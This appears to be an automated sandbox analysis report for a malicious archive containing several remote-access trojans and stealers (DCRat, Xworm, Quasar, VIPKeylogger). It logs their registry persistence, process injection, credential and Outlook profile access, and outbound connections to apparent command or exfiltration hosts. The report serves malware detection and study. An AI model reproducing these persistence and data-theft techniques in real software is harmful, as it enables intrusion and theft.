Analysis Overview
SHA256
6681cb73deb0effc4f44f704c6bddb07e98c1f8da4c8478cca7ddd49abdb0c3f
Threat Level: Known bad
The file archive_7.zip was found to be: Known bad.
Malicious Activity Summary
Umbral
Xenorat family
Detect XenoRat Payload
Umbral family
Dcrat family
Xworm
Remcos
DCRat payload
UAC bypass
Vipkeylogger family
Process spawned unexpected child process
Quasar RAT
Quasar payload
VIPKeylogger
DcRat
Remcos family
Njrat family
Xworm family
Detect Umbral payload
njRAT/Bladabindi
Quasar family
Detect Xworm Payload
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Modifies Windows Firewall
Unsecured Credentials: Credentials In Files
Executes dropped EXE
Loads dropped DLL
Reads data files stored by FTP clients
Checks computer location settings
Reads user/profile data of web browsers
Reads user/profile data of local email clients
Reads WinSCP keys stored on the system
Looks up external IP address via web service
Accesses Microsoft Outlook profiles
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Checks whether UAC is enabled
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Event Triggered Execution: Netsh Helper DLL
Unsigned PE
Browser Information Discovery
Program crash
Detects videocard installed
Checks processor information in registry
outlook_office_path
Uses Task Scheduler COM API
outlook_win_path
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
System policy modification
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
Modifies registry class
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-22 06:18
Signatures
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Dcrat family
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect XenoRat Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Njrat family
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral family
Xenorat family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral23
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20240903-en
Max time kernel
144s
Max time network
123s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b7c2cbdf74b50ca0c081bd3404b8054bd85c6e0ab7b65f5863d2dd3d2fc9cfc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\Application = "C:\\Users\\Admin\\AppData\\Roaming\\app.exe" | C:\Users\Admin\AppData\Local\Temp\1b7c2cbdf74b50ca0c081bd3404b8054bd85c6e0ab7b65f5863d2dd3d2fc9cfc.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2872 set thread context of 1784 | N/A | C:\Users\Admin\AppData\Roaming\app.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe |
| PID 2872 set thread context of 1032 | N/A | C:\Users\Admin\AppData\Roaming\app.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1b7c2cbdf74b50ca0c081bd3404b8054bd85c6e0ab7b65f5863d2dd3d2fc9cfc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1b7c2cbdf74b50ca0c081bd3404b8054bd85c6e0ab7b65f5863d2dd3d2fc9cfc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\1b7c2cbdf74b50ca0c081bd3404b8054bd85c6e0ab7b65f5863d2dd3d2fc9cfc.exe
"C:\Users\Admin\AppData\Local\Temp\1b7c2cbdf74b50ca0c081bd3404b8054bd85c6e0ab7b65f5863d2dd3d2fc9cfc.exe"
C:\Users\Admin\AppData\Roaming\app.exe
"C:\Users\Admin\AppData\Roaming\app.exe"
C:\Users\Admin\AppData\Roaming\app.exe
"C:\Users\Admin\AppData\Roaming\app.exe"
C:\Users\Admin\AppData\Roaming\My.RawFile.exe
"C:\Users\Admin\AppData\Roaming\My.RawFile.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| US | 158.101.44.242:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | smtp.yandex.com | udp |
| RU | 77.88.21.158:587 | smtp.yandex.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.252.143:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 23.192.18.101:80 | www.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Roaming\app.exe
| MD5 | 52fb55a1222aba62a80fe4888cd5f0a0 |
| SHA1 | db6bda74d90463c533a29e49cc715242661d562e |
| SHA256 | e0c3c50f574a2d872991aec7082e075f3813e8c913c679a8e4f5e1d3606eeafd |
| SHA512 | 747447b49572c1cb74fdb18d3551beff0e4065270555e1459f13353a8b4c3af7e1bc95ae601d56556728f95717c103b9e8a798d937e34a19c45b04089902d3d8 |
C:\Users\Admin\AppData\Local\Temp\CabD153.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarDEFB.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
\Users\Admin\AppData\Roaming\My.RawFile.exe
| MD5 | 5a733ef0de5e31e2e4b4abb016c0f251 |
| SHA1 | 28644040a6deac35c20fa931b5d003a97293363e |
| SHA256 | a80c77ca694eca3f6629c54572aba811e64b61975c5db2ff38c8d662d12b1ce7 |
| SHA512 | 9d09ac6b6a560643cac08345ab6ef8578011b11be7d4821d7aa1b3d76f2801d30cb4d206a4ff9335f0ece5cfa2ec8258754b2481102eac3da064e5005f7ffba9 |
Analysis: behavioral26
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
74s
Max time network
148s
Command Line
Signatures
DcRat
Dcrat family
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1bb302f6b26022b9f405c4a06c165b236837688e94ea312a231c8f780e63d2b3.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\1bb302f6b26022b9f405c4a06c165b236837688e94ea312a231c8f780e63d2b3.exe
"C:\Users\Admin\AppData\Local\Temp\1bb302f6b26022b9f405c4a06c165b236837688e94ea312a231c8f780e63d2b3.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
Files
Analysis: behavioral14
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250313-en
Max time kernel
123s
Max time network
145s
Command Line
Signatures
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Audio HD Driver = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Windows Protector.exe" | C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe | N/A |
| Token: 33 | N/A | C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe
"C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | iznarf.bplaced.net | udp |
| DE | 162.55.0.137:80 | iznarf.bplaced.net | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| DE | 162.55.0.137:80 | iznarf.bplaced.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | iznarf.bplaced.net | udp |
| DE | 162.55.0.137:80 | iznarf.bplaced.net | tcp |
Files
Analysis: behavioral19
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20240903-en
Max time kernel
18s
Max time network
118s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Xworm family
Executes dropped EXE
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1b0acebe24bf7a0fa1e25e0e9174184ad9827298b7ff75384049deed6e74c306.exe
"C:\Users\Admin\AppData\Local\Temp\1b0acebe24bf7a0fa1e25e0e9174184ad9827298b7ff75384049deed6e74c306.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
